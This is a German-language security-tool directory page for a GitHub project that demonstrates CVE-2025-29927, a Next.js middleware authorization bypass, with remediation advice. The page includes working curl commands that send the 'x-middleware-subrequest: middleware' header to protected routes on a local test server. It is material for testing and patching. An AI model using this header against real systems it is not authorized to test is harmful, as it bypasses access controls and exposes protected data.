Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/maronnjapan/claude-create-cve-2025-29927
SchwachstellenanalyseWebanwendungs-ExploitationWebsicherheitLernen & Bildung
GitHubmaronnjapan/claude-create-cve-2025-29927

claude-create-CVE-2025-29927

Testet und demonstriert CVE-2025-29927, eine Next.js Middleware-Autorisierungs-Bypass-Schwachstelle. Enthält Exploit- und Normalzugriff-Testskripte sowie Abhilfeanleitungen.

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Next.js Middleware Vulnerability Tester (CVE-2025-29927)

Diese Anwendung demonstriert die Next.js Middleware-Autorisierungsumgehung-Schwachstelle (CVE-2025-29927).

Über die Schwachstelle

CVE-2025-29927 ist eine Schwachstelle zur Umgehung der Autorisierung in der Next.js-Middleware. Durch Senden eines speziell gestalteten HTTP-Headers (x-middleware-subrequest) kann ein Angreifer die in der Middleware implementierten Autorisierungsprüfungen umgehen und möglicherweise auf geschützte Ressourcen zugreifen.

Einrichtungsanweisungen

  1. Installieren Sie die Abhängigkeiten:

    root@kitploit:~
    cd /var/www/react-nextjs/test-middleware-skip
    npm install
    
  2. Starten Sie den Entwicklungsserver:

    root@kitploit:~
    npm run dev
    
  3. Der Server startet unter http://localhost:3000

Testen der Schwachstelle

Normaler Zugriff (sollte blockiert werden)

Versuchen Sie, normal auf die geschützte Route zuzugreifen:

root@kitploit:~
npm run test-normal

oder

root@kitploit:~
curl -v http://localhost:3000/protected-data

Sie sollten eine 401 Unauthorized-Antwort erhalten, da die Middleware den Zugriff blockiert.

Ausnutzen der Schwachstelle

Versuchen Sie, mit dem Exploit-Header auf die geschützte Route zuzugreifen:

root@kitploit:~
npm run test-exploit

oder

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data

Wenn die Anwendung anfällig ist, erhalten Sie eine 200 OK-Antwort mit den geschützten Daten.

Testen der API-Route

Normaler Zugriff (sollte blockiert werden):

root@kitploit:~
curl -v http://localhost:3000/api/protected

Mit Exploit:

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

Abhilfe

Um diese Schwachstelle zu beheben, sollten Sie:

  1. Aktualisieren Sie Next.js auf eine gepatchte Version:

    • Next.js 15.x: Aktualisieren Sie auf Version 15.2.3 oder höher
    • Next.js 14.x: Aktualisieren Sie auf Version 14.2.25 oder höher
    • Next.js 13.x: Aktualisieren Sie auf Version 13.5.9 oder höher
    • Next.js 12.x: Aktualisieren Sie auf Version 12.3.5 oder höher
  2. Falls Sie nicht aktualisieren können, implementieren Sie einen Reverse-Proxy (z. B. Nginx oder Cloudflare), der den x-middleware-subrequest-Header aus eingehenden Anfragen entfernt.

Zusätzliche Testbefehle

Testen Sie, ob die API-Route anfällig ist:

root@kitploit:~
# Normale Anfrage (sollte blockiert werden)
curl -v http://localhost:3000/api/protected

# Mit Exploit-Header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungs- und Sicherheitstestzwecken. Verwenden Sie es, um zu überprüfen, ob Ihre eigenen Next.js-Anwendungen anfällig sind und gepatcht werden müssen.

Tool herunterladen